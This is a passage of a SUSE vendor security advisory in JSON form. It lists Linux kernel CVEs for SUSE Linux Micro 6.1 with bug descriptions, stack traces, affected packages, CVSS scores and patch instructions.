"url": "https://www.suse.com/security/cve/CVE-2025-68297"
},
{
"category": "external",
"summary": "SUSE Bug 1255403 for CVE-2025-68297",
"url": "https://bugzilla.suse.com/1255403"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68297"
},
{
"cve": "CVE-2025-68301",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68301"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: atlantic: fix fragment overflow handling in RX path\n\nThe atlantic driver can receive packets with more than MAX_SKB_FRAGS (17)\nfragments when handling large multi-descriptor packets. This causes an\nout-of-bounds write in skb_add_rx_frag_netmem() leading to kernel panic.\n\nThe issue occurs because the driver doesn\u0027t check the total number of\nfragments before calling skb_add_rx_frag(). When a packet requires more\nthan MAX_SKB_FRAGS fragments, the fragment index exceeds the array bounds.\n\nFix by assuming there will be an extra frag if buff-\u003elen \u003e AQ_CFG_RX_HDR_SIZE,\nthen all fragments are accounted for. And reusing the existing check to\nprevent the overflow earlier in the code path.\n\nThis crash occurred in production with an Aquantia AQC113 10G NIC.\n\nStack trace from production environment:\n```\nRIP: 0010:skb_add_rx_frag_netmem+0x29/0xd0\nCode: 90 f3 0f 1e fa 0f 1f 44 00 00 48 89 f8 41 89\nca 48 89 d7 48 63 ce 8b 90 c0 00 00 00 48 c1 e1 04 48 01 ca 48 03 90\nc8 00 00 00 \u003c48\u003e 89 7a 30 44 89 52 3c 44 89 42 38 40 f6 c7 01 75 74 48\n89 fa 83\nRSP: 0018:ffffa9bec02a8d50 EFLAGS: 00010287\nRAX: ffff925b22e80a00 RBX: ffff925ad38d2700 RCX:\nfffffffe0a0c8000\nRDX: ffff9258ea95bac0 RSI: ffff925ae0a0c800 RDI:\n0000000000037a40\nRBP: 0000000000000024 R08: 0000000000000000 R09:\n0000000000000021\nR10: 0000000000000848 R11: 0000000000000000 R12:\nffffa9bec02a8e24\nR13: ffff925ad8615570 R14: 0000000000000000 R15:\nffff925b22e80a00\nFS: 0000000000000000(0000)\nGS:ffff925e47880000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffff9258ea95baf0 CR3: 0000000166022004 CR4:\n0000000000f72ef0\nPKRU: 55555554\nCall Trace:\n\u003cIRQ\u003e\naq_ring_rx_clean+0x175/0xe60 [atlantic]\n? aq_ring_rx_clean+0x14d/0xe60 [atlantic]\n? aq_ring_tx_clean+0xdf/0x190 [atlantic]\n? kmem_cache_free+0x348/0x450\n? aq_vec_poll+0x81/0x1d0 [atlantic]\n? __napi_poll+0x28/0x1c0\n? net_rx_action+0x337/0x420\n```\n\nChanges in v4:\n- Add Fixes: tag to satisfy patch validation requirements.\n\nChanges in v3:\n- Fix by assuming there will be an extra frag if buff-\u003elen \u003e AQ_CFG_RX_HDR_SIZE,\n then all fragments are accounted for.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68301",
"url": "https://www.suse.com/security/cve/CVE-2025-68301"
},
{
"category": "external",
"summary": "SUSE Bug 1255120 for CVE-2025-68301",
"url": "https://bugzilla.suse.com/1255120"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68301"
},
{
"cve": "CVE-2025-68303",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68303"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: intel: punit_ipc: fix memory corruption\n\nThis passes the address of the pointer \"\u0026punit_ipcdev\" when the intent\nwas to pass the pointer itself \"punit_ipcdev\" (without the ampersand).\nThis means that the:\n\n\tcomplete(\u0026ipcdev-\u003ecmd_complete);\n\nin intel_punit_ioc() will write to a wrong memory address corrupting it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68303",
"url": "https://www.suse.com/security/cve/CVE-2025-68303"
},
{
"category": "external",
"summary": "SUSE Bug 1255122 for CVE-2025-68303",
"url": "https://bugzilla.suse.com/1255122"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68303"
},
{
"cve": "CVE-2025-68305",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68305"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sock: Prevent race in socket write iter and sock bind\n\nThere is a potential race condition between sock bind and socket write\niter. bind may free the same cmd via mgmt_pending before write iter sends\nthe cmd, just as syzbot reported in UAF[1].\n\nHere we use hci_dev_lock to synchronize the two, thereby avoiding the\nUAF mentioned in [1].\n\n[1]\nsyzbot reported:\nBUG: KASAN: slab-use-after-free in mgmt_pending_remove+0x3b/0x210 net/bluetooth/mgmt_util.c:316\nRead of size 8 at addr ffff888077164818 by task syz.0.17/5989\nCall Trace:\n mgmt_pending_remove+0x3b/0x210 net/bluetooth/mgmt_util.c:316\n set_link_security+0x5c2/0x710 net/bluetooth/mgmt.c:1918\n hci_mgmt_cmd+0x9c9/0xef0 net/bluetooth/hci_sock.c:1719\n hci_sock_sendmsg+0x6ca/0xef0 net/bluetooth/hci_sock.c:1839\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg+0x21c/0x270 net/socket.c:742\n sock_write_iter+0x279/0x360 net/socket.c:1195\n\nAllocated by task 5989:\n mgmt_pending_add+0x35/0x140 net/bluetooth/mgmt_util.c:296\n set_link_security+0x557/0x710 net/bluetooth/mgmt.c:1910\n hci_mgmt_cmd+0x9c9/0xef0 net/bluetooth/hci_sock.c:1719\n hci_sock_sendmsg+0x6ca/0xef0 net/bluetooth/hci_sock.c:1839\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg+0x21c/0x270 net/socket.c:742\n sock_write_iter+0x279/0x360 net/socket.c:1195\n\nFreed by task 5991:\n mgmt_pending_free net/bluetooth/mgmt_util.c:311 [inline]\n mgmt_pending_foreach+0x30d/0x380 net/bluetooth/mgmt_util.c:257\n mgmt_index_removed+0x112/0x2f0 net/bluetooth/mgmt.c:9477\n hci_sock_bind+0xbe9/0x1000 net/bluetooth/hci_sock.c:1314",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68305",
"url": "https://www.suse.com/security/cve/CVE-2025-68305"
},
{
"category": "external",
"summary": "SUSE Bug 1255169 for CVE-2025-68305",
"url": "https://bugzilla.suse.com/1255169"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68305"
},
{
"cve": "CVE-2025-68307",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68307"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: gs_usb: gs_usb_xmit_callback(): fix handling of failed transmitted URBs\n\nThe driver lacks the cleanup of failed transfers of URBs. This reduces the\nnumber of available URBs per error by 1. This leads to reduced performance\nand ultimately to a complete stop of the transmission.\n\nIf the sending of a bulk URB fails do proper cleanup:\n- increase netdev stats\n- mark the echo_sbk as free\n- free the driver\u0027s context and do accounting\n- wake the send queue",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68307",
"url": "https://www.suse.com/security/cve/CVE-2025-68307"
},
{
"category": "external",
"summary": "SUSE Bug 1255146 for CVE-2025-68307",
"url": "https://bugzilla.suse.com/1255146"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68307"
},
{
"cve": "CVE-2025-68308",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68308"
}
],
"notes": [
{
"category": "general",
